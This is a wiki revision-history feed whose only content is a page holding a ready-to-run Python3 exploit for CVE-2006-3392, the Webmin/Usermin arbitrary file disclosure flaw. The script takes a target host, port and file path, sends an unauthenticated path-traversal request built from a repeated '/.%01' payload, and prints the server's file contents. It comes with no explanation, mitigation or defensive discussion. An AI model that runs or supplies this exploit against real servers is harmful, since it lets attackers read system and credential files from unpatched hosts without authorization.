https://pwnwiki.com/index.php?action=history&feed=atom&title=CVE-2006-3392_Webmin%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AE%80%E5%8F%96%E6%BC%8F%E6%B4%9E CVE-2006-3392 Webmin任意文件讀取漏洞 - Revision history 2026-04-08T00:20:18Z Revision history for this page on the wiki MediaWiki 1.35.1 https://pwnwiki.com/index.php?title=CVE-2006-3392_Webmin%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AE%80%E5%8F%96%E6%BC%8F%E6%B4%9E&diff=829&oldid=prev Pwnwiki: Created page with "==Exploit== <pre> #!/usr/bin/python3 # Exploit Title: Webmin < 1.290 / Usermin < 1.220 - Arbitrary File Disclosure (Python3) # Exploit Author: Ziani Taha @0xtz # Vendor Homep..." 2021-04-01T02:44:21Z <p>Created page with &quot;==Exploit== &lt;pre&gt; #!/usr/bin/python3 # Exploit Title: Webmin &lt; 1.290 / Usermin &lt; 1.220 - Arbitrary File Disclosure (Python3) # Exploit Author: Ziani Taha @0xtz # Vendor Homep...&quot;</p> <p><b>New page</b></p><div>==Exploit==<br /> &lt;pre&gt;<br /> #!/usr/bin/python3<br /> <br /> # Exploit Title: Webmin &lt; 1.290 / Usermin &lt; 1.220 - Arbitrary File Disclosure (Python3)<br /> # Exploit Author: Ziani Taha @0xtz<br /> # Vendor Homepage: http://www.webmin.com/<br /> # Software Link: http://www.webmin.com/download.html<br /> # Version: Webmin &lt; 1.290 / Usermin &lt; 1.220<br /> # Tested on: Linux<br /> # CVE : CVE-2006-3392<br /> <br /> import argparse<br /> import requests<br /> import os<br /> <br /> parser = argparse.ArgumentParser()<br /> parser.add_argument('-t', '--target', help='HTTP or HTTPS', required=True, type=str)<br /> parser.add_argument('-u', '--url',required=True, help='Server Url or IP adresse')<br /> parser.add_argument('-p', '--port',required=True, type=int, help='Server port ex: 8080')<br /> parser.add_argument('-f', '--file', required=True, help='File to read frome server',type=str)<br /> args = parser.parse_args()<br /> <br /> def main():<br /> payload = '/.%01' * 40<br /> #print(f'paylood:{payload}')<br /> url = (f'{args.target}://{args.url}:{args.port}/unauthenticated/{payload}{args.file}')<br /> print(url)<br /> r = requests.get(url)<br /> print('----------------------------------------------------------------\n')<br /> print(r.text)<br /> print('----------------------------------------------------------------\n')<br /> <br /> <br /> if __name__ == '__main__':<br /> main()<br /> <br /> &lt;/pre&gt;</div> Pwnwiki